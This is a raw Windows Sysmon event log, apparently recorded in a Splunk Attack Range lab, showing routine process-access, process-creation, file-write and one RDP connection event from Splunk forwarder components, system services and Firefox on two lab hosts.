Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806309Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.766{0C1E0330-F316-60EB-4679-00000000D001}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806308Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.563{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB02FB1D514CE585F52B9BAAE63FA9E4,SHA256=F43D29C1AD2C147AB0ED23A7F1FE79530658108B9C54CDF2651A280C8B0BE1C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806307Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.422{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=11B2D9C207525A814897619BB31A818C,SHA256=3441B5C0D63EAC883D58D9D9216976FBE9123CB474B1F472F0CDB91D01885105,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806306Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.094{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F316-60EB-4579-00000000D001}3164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806305Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.094{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806304Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.094{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806303Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.094{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806302Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.094{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806301Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.094{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806300Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.094{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806299Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.094{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806298Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.094{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806297Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.094{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806296Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.094{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F316-60EB-4579-00000000D001}3164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806295Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.078{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F316-60EB-4579-00000000D001}3164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806294Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.079{0C1E0330-F316-60EB-4579-00000000D001}3164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806338Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.766{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7F426DDD80233EB962B8826DC9EA0BEC,SHA256=D60600A945B95613AF60217D71BF670188CAC048FA44ADE622035C9331A882E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806337Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.750{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB6CC13515D7CFC0BEE9ADB69FE014E6,SHA256=D11E0BA9517065C34953DE9A1D8EC4A59A65510CBC80CDD2188A212C605F8BD4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046442Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:18.827{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse3.133.117.249ec2-3-133-117-249.us-east-2.compute.amazonaws.com65086-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001046441Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.656{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=208840A43ED3BF431EBB2B572F3E2A95,SHA256=634A225C298B0A5984E4D894FCD11EE4538FD77D2DBE936B1656420AFD651380,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046440Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2FF8BB4A1A61333868B3A75118DD4585,SHA256=97578FA21030049103916DD8F8817B5AF794F784CE0712F1B0900A48039D7288,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046439Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=306F0525FE52CEFE24EAD0676B2DB3A7,SHA256=0E4C5A50AA7FA642503541479CF69A87D4BA1EB20C364FB59AF8CB4F8D14FD5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046438Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=FBAB33A5A60F9A8B7E614AECF2EC34EB,SHA256=8CD9AAC3FB6D9F41C0FA8B82ED69139095965FAC31F99264C0B508E64C305EBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046437Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9BE230CECFF8053831A08D4726F265F5,SHA256=94F041A46BE2C6281C6F4D2A736EA5358A58E039322D8411FC17F0A5779B4436,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046436Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5218A5C0B76F586D3687B4A5B1EA5587,SHA256=BE7D97934E9626C49E3AC975DB657D728E5F70F906F2B61881455FABA00949E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046435Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=EC8C25189B76BF4C511D061B2674E10A,SHA256=8819DAD3118DD5F43410EA316978E12BE192BFAE74D9175F79CD66925CE9D99F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046434Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B1DA4009F5C646AF012D2F51A48DC314,SHA256=9B297D9F5EBB385AB7198B69FC54B51770E58D14196C574E73DF6368FF59A07A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046433Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C172711955A939D8698F7A0651A1E309,SHA256=536999849FCD81DE214D32B21250586D7C9AC423871C095176ED64C0D9B74B0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046432Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.139{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=523B0AD66793AEB8D4BC4DB231E113B9,SHA256=0C4ADA9E445E0FE62D06D208A711E7E6A5E1FBAC6EDA7665580A7B51BAAFB806,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046431Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.138{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1C5DFFEB79D9A94EC4A45E52E4DDBD65,SHA256=90529B00EC6FE84B9318BE1369B57287C4EA1427B4E45EA7A495B41C0F4F86CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046430Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.137{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=FAFEEF8726B565B1E6A5D72A7F9C9957,SHA256=CA9DC6E4640C14EA939E582B701D1149849715BEDD591F52CD793DEAF97AE0FC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806336Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.610{0C1E0330-F317-60EB-4779-00000000D001}10001668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806335Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.469{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F317-60EB-4779-00000000D001}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806334Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.469{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806333Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 